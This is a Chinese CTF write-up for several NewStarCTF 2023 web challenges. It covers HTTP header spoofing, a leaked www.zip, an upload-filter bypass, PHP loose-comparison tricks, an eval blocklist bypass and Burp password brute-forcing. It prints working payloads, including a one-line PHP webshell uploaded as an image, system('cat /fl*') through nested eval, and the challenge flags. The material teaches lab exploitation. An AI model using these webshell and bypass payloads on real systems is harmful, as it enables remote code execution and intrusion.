提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
img
提示用post 传 secret
img
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
img
post 传一下
img
改一下cookie,改成ctfer
img
改 User-Agent 为 NewStarCTF2023
img
改Referer为 newstarctf.com
img
最后改一下请求头

POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28821
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:28821
Content-Type: application/x-www-form-urlencoded
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: newstarctf.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Connection: close
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000d

img

泄露的秘密

找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txt 和 index.php

PART ONE: flag{r0bots_1s_s0_us3ful
<?php
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";

flag

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

前端有文件后缀名检测
img
直接在包中修改后缀名

POST / HTTP/1.1
Host: 56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="file"; filename="webshell2.php"
Content-Type: image/png

<?=system($_GET[2]);
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="submit"

Upload!!!
------WebKitFormBoundaryJDwfZKOoSI69Xzwk--

传完之后访问
http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
img

flag

flag{32ae814a-7562-460c-a936-e6b88ed93f8f}

Begin of PHP

<?php
// Challenge source ("Begin of PHP"): five gates, each resting on a classic PHP
// loose-typing weakness.  The bypass used in this write-up is noted per level.
error_reporting(0);
highlight_file(__FILE__);

// Level 1: `==` compares the two md5 hex strings numerically when both look like
// "0e<digits>" (scientific notation for 0), so different inputs such as QNKCDZO
// and 240610708 compare equal although their digests differ.  `===` would close this.
if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

// Level 2: md5() and sha1() of an array both return NULL (the warning is hidden by
// error_reporting(0)), so `key3[]=` satisfies even the strict comparison.
if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

// Level 3: strcmp() given an array returns NULL, and NULL == 0 is true, so `key4[]=`
// passes without knowing /flag (on the PHP version used here; newer versions may
// throw a TypeError instead).
if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

// Level 4: is_numeric() of an array is false, and an array compares greater than any
// integer, so `key5[]=1` is "not numeric" yet "> 2023".
if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

// Level 5: extract() turns every POST field into a variable, so `flag5=1` sets $flag5.
// The write-up's `_POST=1` relies on extract() replacing $_POST itself, so the foreach
// below iterates over a scalar (nothing happens) and the alphanumeric filter never runs.
// extract() on user input is the root cause here -- it lets a client set arbitrary variables.
if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

get传参http://7cef97a6-de7f-45e3-be80-6aff9cecbbab.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=%22%22&key5[]=1
hackbar传参key3[]=&_POST=1&flag5=1
img

R!C!E!

<?php
// Challenge source ("R!C!E!"): an eval() gate behind a 24-bit md5 prefix check and a
// keyword blocklist -- both cheaply bypassed, as the write-up shows.
highlight_file(__FILE__);
// PHP rewrites '.' in request parameter names to '_', so a field literally named
// "e_v.a.l" cannot be sent directly.  The write-up sends "e[v.a.l" instead: the
// unclosed '[' is turned into '_' and the rest of the name is then left alone.
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    // Only the first 6 hex digits (24 bits) of the digest are checked, so a matching
    // preimage ("114514" here) is found by brute force almost immediately.
    if(substr($password,0,6)==="c4d038"){
        // The blocklist only sees the outer payload; nesting eval($_POST[1]) moves the
        // forbidden words into a second parameter that is never inspected.
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
} 

爆破得到MD5(114514)='c4d038b4bed09fdb1471ef51ec3a32cd'
满足前6位是c4d038
hackbar传参
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img
获取flag
password=114514&e[v.a.l=eval($_POST[1]);&1=system("cat /fl*");
img

EasyLogin

密码应该是个md5
img
随便注册个用户看看
img
登录成功后看看源代码可以肯定是md5
img
是个弱口令
img
尝试爆破admin
img
发送到intruder
payload位置选择pwd
img
payload设置一下,尝试用1400w_rockyou字典爆破, processing设置成md5
img
有个8360的不一样,应该就是爆破成功的,把pw复制一下
img
回到登录界面,登录admin,pw随便写,拦截到请求包后把pw修改成复制的pw
记得在proxy setting里面把抓返回包的也开一下
img
img
修改完pw后一直点放行,抓到含flag的response包
img
